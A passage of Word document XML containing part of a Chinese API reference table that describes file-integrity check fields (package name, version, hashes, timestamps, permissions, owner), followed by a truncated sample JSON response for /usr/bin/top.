          <w:p w14:paraId="01EF1D73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="284ECA55" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1829952F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>package_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E4CF49C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3950B18E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67B866DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">包名，rpm：检查rpm包; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dpkg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：检查</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dpkg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>包</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4045FB2E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71B4F27F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>package_version</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45C7E740" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20FF587F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EF2B63B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>包版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0A7E3F5B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57C1F664" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>package_full_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47163CA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B20F8AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AF0FF47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>包名全称</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E9B21FD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28514394" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>package_hash</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="509A3D1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48274BCA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26935E73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>软件包备份的MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7DA0CC46" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2073DA4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_hash</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="178A8B53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="390FB057" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29ECD47F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>脚本扫描计算的MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="206EE07D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CC985DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>access_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A20CFBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57CE73CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="263D8047" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件的最近访问时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="69181160" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58A6D3D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>modify_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1319639B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="500EE0E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65D64B6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件内容的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5A1998A2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B5F70FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="777E369B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4001C7F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F60A7FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1208959C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23016521" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_size</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07917A82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="731586B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BDD40B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F672199" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E602F13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>change_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AFAEEF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07ADD4A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32C374DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件属性的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3ED40B19" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02809FDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B817405" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="504CA707" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27B0A5C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6829E4B2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67BA8F14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B0FD9AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A1E4213" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65D99B5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="165722F8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A377D6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DD35C45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20879A36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D33C69D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6C475347" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27E544D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_permission</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="218E76D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71712F27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E2AD558" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="682DCA17" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0752C17C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_owner</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CD55ABD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7006A9F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AB3A0D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件所属用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="27A3ADB8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FAED5D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_group</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="314E216C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D650C4B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48956DD7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件所属组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D4C32CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F45BCD5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>package_full_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "procps_1:3.3.9-1ubuntu2.3_amd64",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>modify_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1554124485,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>package_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>procps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>package_hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "f482a1f4e8809875d0d1b93d5f02709e",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>change_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1554124485,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "file_sha256": </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"20c5ecccfd63cd5eeb701b34690ebadf1a532222105c572a2d38021fee8c1824",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "file_sha1": "bf84d15e81b28cdc5c8227c8d261a43ccd5ad929",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/top",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>access_time</w:t>
      </w:r>
